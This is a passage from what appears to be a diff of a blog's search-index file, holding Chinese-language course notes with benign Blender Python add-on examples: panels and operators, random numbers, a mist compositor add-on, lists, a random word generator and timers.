    bl_options = {'REGISTER', 'UNDO'}

    loc : bpy.props.FloatVectorProperty()

    def execute(self, context):
    bpy.ops.mesh.primitive_cube_add(location=self.loc)
    return {'FINISHED'}


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    开跑!按下 Button 按钮后,将会生成一个正方体,同时出现一个 Dialogbox 用于控制正方体的位置。这个操作可以用 Ctrl+Z 来撤销。

    png

    API Changes and where to Find them?

    说 Blender 更新到 3.0 了,一些 API 发生了变化,可以从 Reference/Release Notes/3.0/Python API - Blender Developer Wiki 里查看,其实现在也可以 chatGPT。

    ]]>
    + 课程

    How to Generate Random Numbers

    教你怎么用随机数:

    Python Console 下:

    • import random 导入随机数模块

    • random.uniform(0, 1) 生成一个 0-1 的随机浮点数,服从均匀分布

    • random.choice(range(0,10)) 生成一个 0-10(不包含 10)的随机整数,服从均匀分布

    Blender 下 print() 的输出可以在 Window-Toggle System Console 里显示。

    png

    将随机数用在插件中的示例:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    import bpy
    import random
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import FloatProperty, PointerProperty, IntProperty


    class MyProperties(PropertyGroup):
    random_number : IntProperty(name='Random Number', default=0)
    text_list = ['A', 'B', 'C']
    icon_list = ['GHOST_DISABLED', 'MATERIAL', 'PINNED']


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    layout.label(text=mytool.text_list[mytool.random_number])
    layout.label(icon=mytool.icon_list[mytool.random_number])
    layout.prop(mytool, "random_number")
    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Generate Random Number"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    x = random.choice(range(0, 3))
    mytool.random_number = x
    print(x)

    return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)
    bpy.types.Scene.my_tool = PointerProperty(type=MyProperties)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    开跑,按下 Generate Random Number,就会生成一个随机数,并导致面板标题和图标的变化。

    png

    Add-on Creation - Insta-Mist

    比起原先的代码,加了一些节点存在性检查:

    1
    2
    3
    4
    comp_node = tree.nodes.get('Composite')
    if comp_node is None:
    comp_node = tree.nodes.new('CompositorNodeComposite')
    comp_node.name = 'Composite'
    1
    2
    3
    4
    render_layer_node = tree.nodes.get('Render Layers')
    if render_layer_node is None:
    render_layer_node = tree.nodes.new('CompositorNodeRLayers')
    render_layer_node.name = 'Render Layers'
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    mix1 = tree.nodes.get('Mix')
    if mix1 is not None:
    tree.nodes.remove(mix1)

    mix2 = tree.nodes.get('Mix.001')
    if mix2 is not None:
    tree.nodes.remove(mix2)

    cr = tree.nodes.get('ColorRamp')
    if cr is not None:
    tree.nodes.remove(cr)

    这段代码是一个基于 Blender 的插件,用于在 3D 视图中添加雾效果。主要包含三个类 INSTAMIST_PT_main_panel、INSTAMIST_PT_sub_panel 和 INSTAMIST_OT_add_mist。

    其中 INSTAMIST_PT_main_panel 是主面板类,包含一个按钮“Add Mist”,点击按钮会触发 INSTAMIST_OT_add_mist 类的 execute 方法来开启或关闭雾效果。

    INSTAMIST_PT_sub_panel 是子面板类,当且仅当场景的视图层使用了 pass_mist 属性才会显示面板,其中包括了 start、depth 和 falloff 这三个属性来控制雾的起始位置、深度和衰减程度。

    最后 INSTAMIST_OT_add_mist 是操作员类,通过 execute 方法来根据当前状态开启或关闭雾效果,并对节点树进行相应的操作。如果开启雾效果,则会调用 mist_comp_action 方法来添加新的节点,否则会移除原有的节点。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    bl_info = {
    "name": "INSTAMIST",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (2, 90, 1),
    "location": "View3D > N > INSTA-MIST",
    "description": "Adds Mist to your scene along with arranging the compositor",
    "warning": "",
    "doc_url": "",
    "category": "Add Mist",
    }


    import bpy
    from bpy.types import Panel, Operator


    def mist_comp_action(context):
    tree = context.scene.node_tree

    comp_node = tree.nodes.get('Composite')
    if comp_node is None:
    comp_node = tree.nodes.new('CompositorNodeComposite')
    comp_node.name = 'Composite'
    comp_node.location = (700, 0)

    viewer_node = tree.nodes.new('CompositorNodeViewer')
    viewer_node.location = (700, 200)

    render_layer_node = tree.nodes.get('Render Layers')
    if render_layer_node is None:
    render_layer_node = tree.nodes.new('CompositorNodeRLayers')
    render_layer_node.name = 'Render Layers'
    render_layer_node.location = (-200, 0)

    mix_node = tree.nodes.new('CompositorNodeMixRGB')
    mix_node.location = (500, 0)
    mix_node.blend_type = 'ADD'
    mix_node.use_clamp = True

    mix2_node = tree.nodes.new('CompositorNodeMixRGB')
    mix2_node.location = (300, 0)
    mix2_node.blend_type = 'MULTIPLY'
    mix2_node.use_clamp = True

    cr_node = tree.nodes.new('CompositorNodeValToRGB')
    cr_node.location = (0, 0)
    cr_node.color_ramp.elements[0].color = (0.2, 0.2, 0.2, 1)
    cr_node.color_ramp.elements.new(position= 0.27)

    link = tree.links.new

    link(mix_node.outputs[0], viewer_node.inputs[0])
    link(mix_node.outputs[0], comp_node.inputs[0])
    link(mix2_node.outputs[0], mix_node.inputs[1])
    link(cr_node.outputs[0], mix2_node.inputs[1])
    link(render_layer_node.outputs[0], mix_node.inputs[2])
    link(render_layer_node.outputs[3], cr_node.inputs[0])
    return {'FINISHED'}



    class INSTAMIST_PT_main_panel(Panel):
    bl_label = "INSTA-MIST"
    bl_idname = "INSTAMIST_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "INSTA-MIST"

    def draw(self, context):
    layout = self.layout
    scene = context.scene


    layout.operator("instamist.add_mist_operator")


    class INSTAMIST_PT_sub_panel(Panel):
    bl_label = "INSTA-MIST Options"
    bl_idname = "INSTAMIST_PT_sub_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "INSTA-MIST"
    bl_parent_id = 'INSTAMIST_PT_main_panel'

    @classmethod
    def poll(cls, context):
    return (context.scene.view_layers["ViewLayer"].use_pass_mist == True
    )

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    world = scene.world.mist_settings

    layout.prop(world, "start")
    layout.prop(world, "depth")
    layout.prop(world, "falloff")


    class INSTAMIST_OT_add_mist(Operator):
    bl_label = "Enable/Disable Mist"
    bl_idname = "instamist.add_mist_operator"



    def execute(self, context):
    scene = context.scene
    camera = bpy.data.cameras['Camera']
    vl = scene.view_layers["ViewLayer"]
    tree = scene.node_tree

    if vl.use_pass_mist == False:
    vl.use_pass_mist = True
    camera.show_mist = True
    if scene.use_nodes == False:
    scene.use_nodes = True
    mist_comp_action(context)

    elif vl.use_pass_mist == True:
    vl.use_pass_mist = False
    camera.show_mist = False

    mix1 = tree.nodes.get('Mix')
    if mix1 is not None:
    tree.nodes.remove(mix1)

    mix2 = tree.nodes.get('Mix.001')
    if mix2 is not None:
    tree.nodes.remove(mix2)

    cr = tree.nodes.get('ColorRamp')
    if cr is not None:
    tree.nodes.remove(cr)

    comp_node = tree.nodes.get('Composite')
    viewer_node = tree.nodes.get('Viewer')
    render_layer_node = tree.nodes.get('Render Layers')

    tree.links.new(render_layer_node.outputs[0], comp_node.inputs[0])
    tree.links.new(render_layer_node.outputs[0], viewer_node.inputs[0])
    return {'FINISHED'}


    classes = [INSTAMIST_PT_main_panel, INSTAMIST_OT_add_mist, INSTAMIST_PT_sub_panel]



    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    开跑!按下 Enable/Disable Mist 后,会在 Compositor 生成/删除节点,以 开启/关闭 雾效果。

    png

    按下 F12 就可以看到渲染后的效果:

    png

    Lists - Create, Append and Remove

    教你怎么用 python 里的 list:

    • list.append() 追加一个元素
    • list.remove() 删除一个元素
    • list.extend() 追加多个元素
    • list.clear() 清空列表
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    import bpy
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import EnumProperty, PointerProperty, StringProperty


    class MyProperties(PropertyGroup):

    my_enum : EnumProperty(
    name= "Enumerator / Dropdown",
    description= "sample text",
    items= [('OP1', "Append", ""),
    ('OP2', "Remove", "")
    ]
    )

    new_item : StringProperty()
    my_list = []

    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool


    layout.prop(mytool, "my_enum", expand=True)
    layout.prop(mytool, 'new_item')
    layout.operator("addonname.myop_operator")





    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Submit"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool
    list = mytool.my_list
    enum = mytool.my_enum
    new_item = mytool.new_item

    a = 'alpha'
    b = 'beta'

    if enum == 'OP1':
    if a and b not in list:
    list.extend((a, b))
    if new_item != '':
    if new_item not in list:
    list.append(new_item)
    else:
    list.clear()
    print(list)

    return {'FINISHED'}




    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = PointerProperty(type= MyProperties)

    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool



    if __name__ == "__main__":
    register()

    png

    How to Display Info Messages

    介绍了一些可以将消息输出至 Info 的语句:

    • self.report({'INFO'}, "This is a Custom Message")
    • self.report({'WARNING'}, "This is a Custom Message")
    • self.report({'ERROR'}, "This is a Custom Message")

    Why is it not Working? : Episode 1

    教你怎么调试错误。

    How to make a Random Word Generator

    写了一个随机单词生成器:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    bl_info = {
    "name": "Random Word Generator",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (2, 90, 1),
    "location": "View3D > N > Random Word Gen Tab",
    "description": "Generates a Random Phrase",
    "warning": "",
    "doc_url": "",
    "category": "Add Words",
    }

    import bpy
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import IntProperty, PointerProperty, BoolProperty
    from random import randint


    class RandomWordGenProperties(PropertyGroup):

    list_a = ["A", "Dr", "Mr", "Mrs", "Our", "The"]

    list_b = ["Adorable", "Adventurous", "Agressive", "Agreeable", "Angry", "Annoyed", "Annoying", "Anxious", "Arrogant", "Attractive", "Average", "Awful", "Bad", "Beautiful", "Better", "Bewildered", "Bloody", "Blushing", "Bored", "Brainy", "Brave", "Breakable", "Bright", "Broken", "Bronze", "Busy", "Calm", "Careful", "Cautious", "Charming", "Cheerful", "Clean", "Clear", "Clever", "Cloudy", "Clumsy", "Colorful", "Comfortable", "Condemned", "Confused", "Cooperative", "Courageous", "Crazy", "Creepy", "Crowded", "Cruel", "Curious", "Cute", "Dangerous", "Dark", "Dead", "Defeated", "Defiant", "Delightful", "Depressed", "Determained", "Different", "Difficult", "Disgusted", "Doubtful", "Dull", "Eager", "Easy", "Elated", "Elegant", "Embarrassed", "Enchanting", "Encouraging", "Energetic", "Enthusiastic", "Envious", "Evil", "Excited", "Expensive", "Exuberant", "Faithful", "Famous", "Fancy", "Fantastic", "Fierce", "Filthy", "Fine", "Foolish", "Fragile", "Frail", "Frantic", "Friendly", "Frightened", "Frozen", "Funny", "Gentle", "Gifted", "Glamorous", "Gleaming", "Glorious", "Good", "Gold", "Golden", "Gorgeous", "Graceful", "Greiving", "Grotesque", "Grumpy", "Handsome", "Happy", "Healthy", "Helpful", "Helpless", "Hilarious", "Horrible", "Hungry", "Hurt", "Important", "Impossible", "Industrial", "Inexpensive", "Innocent", "Inquisitive", "Itchy", "Jelous", "Jolly", "Joyous", "Kind", "Lazy", "Light", "Lively", "Lonely", "Long", "Lovely", "Lucky", "Magnificent", "Misty", "Modern", "Motionless", "Muddy", "Mushy", "Mysterious", "Nasty", "Naughty", "Nervous", "Never-ending", "Nice", "Obedient", "Obnoxious", "Odd", "Old", "Old-fashoined", "Open", "Outrageous", "Outstanding", "Perfect", "Plain", "Pleasant", "Poised", "Poor", "Powerful", "Precious", "Proud", "Putrid", "Puzzled", "Quaint", "Real", "Relieved", "Repulsive", "Rich", "Righteous", "Rival", "Rusty", "Secret", "Scary", "Silver", "Silvery", "Selfish", "Shiny", "Shy", "Silly", "Sleepy", "Smiling", "Sore", "Sparkling", "Splendid", "Spotless", "Stalking", "Steady", "Strange", "Stranger", "Stupid", "Subtle", "Successful", "Super", "Talented", "Tame", "Tender", "Tense", "Terrible", "Thankful", "Thoughful", "Thoughtless", "Tired", "Tough", "Troubled", "Ugliest", "Ugly", "Unsightly", "Unusual", "Upset", "Uptight", "Vast", "Victorious", "Wandering", "Weary", "Wicked", "Wild", "Witty", "Worried", "Wrong", "Zelous"]

    list_c = ["Actor", "Anchor", "Antagonist", "Apple", "Angel", "Angle", "Army", "Astronaut", "Ball", "Balloon", "Beach", "Bear", "Beast", "Book", "Brain", "Cake", "Castle", "Coast", "Colony", "Complex", "Conundrum", "Core", "Crowd", "Dancer", "Detective", "Detector", "Devil", "Director", "Diver", "Driver", "Express", "Factory", "Family", "Forest", "Future", "Gamer", "Garden", "Hacker", "Hangman", "History", "House", "Idea", "Island", "Jail", "Jester", "Joker", "King", "Knight", "Lake", "Lighthouse", "Matrix", "Mind", "Monument", "Moon", "Mountain", "Navy", "Nail", "Night", "Office", "Officer", "Operator", "Page", "Park", "Path", "Pickle", "Pizza", "Place", "Planet", "Player", "Picture", "Price", "Prince", "Princess", "Prison", "Program", "Programmer", "Protagonist", "Queen", "Razor", "Rifle", "Ring", "Reptile", "Road", "River", "Science", "Situation", "Society", "Soldier", "Sound", "Steed", "Story", "Surface", "Tavern", "Tower", "Traveler", "Tree", "Undead", "Unicorn", "Vampire", "Warrior", "Wizard", "World", "Wolf", "Zombie"]

    number_1 : IntProperty(default= 0)
    number_2 : IntProperty(default= 0)
    number_3 : IntProperty(default= 0)

    number_4 : IntProperty(default= 1)

    word_count : IntProperty(default= 3, min= 1, max= 3, description= "Select How Many Words to be Generated")

    wc_bool : BoolProperty(default= False, description= "Selecting this Option will randomize the Word Count")


    class RANDOMWORDGEN_PT_main_panel(Panel):
    bl_label = "Random Word Generator"
    bl_idname = "RANDOMWORDGEN_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Random Word Gen"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    wc = mytool.word_count
    r_wc = mytool.wc_bool

    if r_wc == False:
    layout.prop(mytool, "word_count", text= "Word Count")
    row = layout.row()

    if wc >= 1:
    row.label(text= mytool.list_a[mytool.number_1])
    if wc >= 2:
    row.label(text= mytool.list_b[mytool.number_2])
    if wc >= 3:
    row.label(text= mytool.list_c[mytool.number_3])
    else:
    row = layout.row()
    if mytool.number_4 >= 1:
    row.label(text= mytool.list_a[mytool.number_1])
    if mytool.number_4 >= 2:
    row.label(text= mytool.list_b[mytool.number_2])
    if mytool.number_4 >= 3:
    row.label(text= mytool.list_c[mytool.number_3])
    layout.prop(mytool, "wc_bool", text= "Randomize Word Count")

    layout.operator("randomwordgen.myop_operator")


    class RANDOMWORDGEN_OT_my_op(Operator):
    bl_label = "Generate Random Words"
    bl_idname = "randomwordgen.myop_operator"


    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    a = 0

    b2 = len(mytool.list_a)
    b = b2 - 1

    c2 = len(mytool.list_b)
    c = c2 - 1

    d2 = len(mytool.list_c)
    d = d2 - 1

    e = 1
    f = 3

    r1 = randint(a, b)
    r2 = randint(a, c)
    r3 = randint(a, d)

    r4 = randint(e, f)

    mytool.number_1 = r1
    mytool.number_2 = r2
    mytool.number_3 = r3

    mytool.number_4 = r4

    return {'FINISHED'}


    classes = [RandomWordGenProperties, RANDOMWORDGEN_PT_main_panel, RANDOMWORDGEN_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = PointerProperty(type= RandomWordGenProperties)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    点击 Generate Random Words 就可以从单词库中生成一堆单词!

    png

    Application Timers

    这段代码是一个简单的 Blender Python 脚本,用于创建 10 个位置不同的立方体。该脚本使用了 Blender 的定时器功能,以便在指定时间间隔内反复调用函数 “run_10_times()”。

    首先,使用 import bpy 导入必要的 Blender Python 模块。

    然后,创建了全局变量 counter 和 loc, 分别用于追踪立方体数量和立方体位置。

    接下来定义函数 run_10_times(), 它会在启动定时器后被调用。该函数使用 bpy.ops.mesh.primitive_cube_add() 命令在场景中添加一个立方体。该命令需要一个位置参数,它将使用 loc 变量中的值来确定立方体的垂直位置。然后,counter 变量增加 1,loc 变量增加 2(以确保每个立方体都有不同的位置)。

    函数还打印出当前计数器值。

    如果 counter 变量的值达到 10,函数返回 None,以便停止定时器。否则,它将返回 0.5,以便等待一段时间(0.5s)后再次调用该函数。

    最后,通过 bpy.app.timers.register() 函数注册函数 run_10_times(),以便在 Blender 中启动定时器。该函数将在 Blender 界面中点击 “Run Script” 按钮后执行。

    总之,该脚本使用 Blender Python 的定时器功能,创建 10 个位置不同的立方体,每个立方体之间延迟一定时间。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    import bpy

    counter = 0
    loc = 0


    def run_10_times():
    global loc
    bpy.ops.mesh.primitive_cube_add(location=(0, loc, 0))
    global counter
    counter += 1
    loc += 2
    print(counter)
    if counter == 10:
    return None
    return 0.5


    bpy.app.timers.register(run_10_times)

    png

    Why is it not Working? : Episode 2

    这段代码是一个 Blender 插件的示例,定义了一个面板和一个操作符。该插件提供了一些功能来添加粒子系统到选择的对象中。

    首先,导入必要的模块,包括 bpy 和 Panel、Operator 类型。

    接下来定义了一个面板类 ADDONNAME_PT_main_panel,并从 Panel 类继承。在这个类中设置了一些属性,例如名称、区域类型和分类等。draw() 方法用于绘制面板中的内容,在这里使用 layout 属性创建了三个控件,包括两个用于设置粒子系统参数的属性和一个用于执行操作的按钮。

    然后定义了一个操作符 ADDONNAME_OT_my_op,并从 Operator 类继承。在这个类中设置了一些属性,例如名称和 ID 名称等。execute() 方法是操作符的核心部分,它将在用户按下按钮时被调用。在这里,它使用 bpy.ops.object.particle_system_add() 命令向选定的对象中添加了一个粒子系统。

    最后,将 ADDONNAME_PT_main_panel 和 ADDONNAME_OT_my_op 类添加到 classes 列表中,并使用 bpy.utils.register_class() 函数注册这些类。同样,使用 unregister() 函数在插件不再需要时注销这些类。

    如果这个脚本是直接运行的,那么它将调用 register() 方法并注册这些类。如果该脚本作为其他插件的一部分被导入,则 register() 方法不会被调用。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    import bpy
    from bpy.types import Panel, Operator


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"


    def draw(self, context):
    layout = self.layout

    p_data = bpy.data.particles["ParticleSettings"]

    layout.prop(p_data, "count")
    layout.prop(p_data, "use_rotations")
    if p_data.use_rotations == True:
    layout.prop(p_data, "rotation_factor_random")
    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Add Particle System"
    bl_idname = "addonname.myop_operator"
    """Add a Particle System to your Selected Object"""


    def execute(self, context):
    scene = context.scene
    obj = context.object
    bpy.ops.object.particle_system_add()
    return {'FINISHED'}


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    The REDO Operator

    这段代码是 Blender 插件的示例,定义了一个面板和一个操作符。该插件提供一个按钮,点击后会在当前场景中添加一个立方体。

    首先导入必要的模块,包括 bpy 和 Panel、Operator 类型。

    然后定义了一个面板类 ADDONNAME_PT_main_panel,并从 Panel 类继承。在这个类中设置了一些属性,例如名称、区域类型和分类等。draw() 方法用于绘制面板中的内容,在这里使用 layout 属性创建了一个控件,即一个按钮,并使用 layout.operator() 函数将其添加到面板中。

    接着定义了一个操作符 ADDONNAME_OT_my_op,并从 Operator 类继承。在这个类中设置了一些属性,例如名称和 ID 名称等。bl_options 属性指定了操作符的行为,包括注册和撤销。loc 属性是一个 FloatVectorProperty,表示要添加的立方体的位置。

    execute() 方法是操作符的核心部分,它将在用户按下按钮时被调用。在这里,它使用 bpy.ops.mesh.primitive_cube_add() 命令向当前场景中添加了一个立方体,位置由 self.loc 属性决定。

    最后,将 ADDONNAME_PT_main_panel 和 ADDONNAME_OT_my_op 类添加到 classes 列表中,并使用 bpy.utils.register_class() 函数注册这些类。同样,使用 unregister() 函数在插件不再需要时注销这些类。

    如果这个脚本是直接运行的,那么它将调用 register() 方法并注册这些类。如果该脚本作为其他插件的一部分被导入,则 register() 方法不会被调用。

    • bl_options = {'REGISTER', 'UNDO'}

      • bl_options 是一个操作符的属性,用于指定该操作符的行为。它是一个包含字符串的集合,可以指定以下选项:

        • REGISTER:表示将该操作作为已注册的操作来显示,即将其添加到撤销历史记录中。如果未启用此选项,则执行该操作不会被记录在撤销历史记录中。
        • UNDO:表示该操作可被撤销。如果未启用此选项,则在执行该操作后无法撤消该操作。

        在代码示例中,bl_options 属性被设置为 {‘REGISTER’, ‘UNDO’},表示该操作符应被注册并可以被撤销。这样一来,当用户单击添加的按钮时,该操作的执行将被记录在撤销历史记录中,并且用户可以随时撤消该操作。

    • 在 Blender 中,可以使用 Ctrl + Z 快捷键或 Edit 菜单中的 Undo 命令来撤消先前执行的操作。如果你想一次性撤销多个操作,可以多次按下 Ctrl + Z 或多次选择 Undo 命令。

      如果你想恢复先前撤消的操作,可以使用 Ctrl + Shift + Z 快捷键或 Edit 菜单中的 Redo 命令来重做操作。同样,你可以多次按下 Ctrl + Shift + Z 或多次选择 Redo 命令以重复多个操作。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    import bpy
    from bpy.types import Panel, Operator


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"


    def draw(self, context):
    layout = self.layout

    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Button"
    bl_idname = "addonname.myop_operator"
    bl_options = {'REGISTER', 'UNDO'}

    loc : bpy.props.FloatVectorProperty()

    def execute(self, context):
    bpy.ops.mesh.primitive_cube_add(location=self.loc)
    return {'FINISHED'}


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    开跑!按下 Button 按钮后,将会生成一个正方体,同时出现一个 Dialogbox 用于控制正方体的位置。这个操作可以用 Ctrl+Z 来撤销。

    png

    API Changes and where to Find them?

    说 Blender 更新到 3.0 了,一些 API 发生了变化,可以从 Reference/Release Notes/3.0/Python API - Blender Developer Wiki 里查看,其实现在也可以 chatGPT。

    ]]>
    @@ -6377,7 +6377,7 @@ /posts/Software-Blender%20&%20Python%20(11-20)/ - 课程

    Updated Registration Method

    emmmm 就是把 register() 里注册的类放到一个 for 循环里:

    def register():
    bpy.utils.register_class(NODE_OT_compGroup)
    bpy.utils.register_class(NODE_PT_customPanel)


    def unregister():
    bpy.utils.unregister_class(NODE_OT_compGroup)
    bpy.utils.unregister_class(NODE_PT_customPanel)


    if __name__ == "__main__":
    register()

    改为:

    classes = [NODE_OT_compGroup, NODE_PT_customPanel, YOUR_CLASS_NAME]

    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    5 Scripting Tips for Beginners

    介绍了一些小技巧:

    在 python console 里,输入代码:

    列出场景中已有的 3D 物体:

    list(bpy.data.objects)

    列出场景中已有的材质:

    list(bpy.data.materials)

    新建一个材质:

    bpy.data.materials.new("My Material")

    Text Editor 中,Text-Live Edit 可以实时运行脚本。

    jpg

    Enumerator / Drop down Menu

    这段代码定义了两个类和两个函数,用于在 Blender 中添加一个面板和一个操作员。

    1. ADDONNAME_PT_TemplatePanel 类 该类继承自 bpy.types.Panel,它创建了一个面板并定义了它的一些属性。bl_label 属性定义了面板的名称,bl_idname 属性是面板的唯一标识符,bl_space_type 和 bl_region_type 属性定义了面板在哪个空间和区域中显示,bl_category 属性定义了面板应该显示在哪个选项卡中。draw() 方法定义了面板的布局和内容,layout 变量用来管理面板的布局和元素,layout.operator() 方法添加了一个操作按钮,该按钮调用名为 “wm.template_operator” 的操作员。
    2. ADDONANE_OT_TemplateOperator 类 该类继承自 bpy.types.Operator,它创建了一个操作员,并定义了它的一些属性。bl_label 属性创建了操作员的按钮标签,bl_idname 属性是操作员的唯一标识符。preset_enum 属性是一个枚举值,它提供了三个不同的选项,每个选项都有一个唯一的 id、一个名称和一个描述。invoke() 方法定义了当用户单击操作员时执行的代码,draw() 方法定义了操作员的布局和内容,execute() 方法定义了操作员执行的代码。
    3. register() 函数 该函数使用 bpy.utils.register_class() 方法注册 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类,将它们添加到 Blender 中。
    4. unregister() 函数 该函数使用 bpy.utils.unregister_class() 方法取消注册 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类,将它们从 Blender 中移除。

    最后,如果该脚本被直接运行(而不是被其他脚本导入),则调用 register() 函数将 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类添加到 Blender 中。

    import bpy


    class ADDONNAME_PT_TemplatePanel(bpy.types.Panel):
    bl_label = 'Name of the Panel'
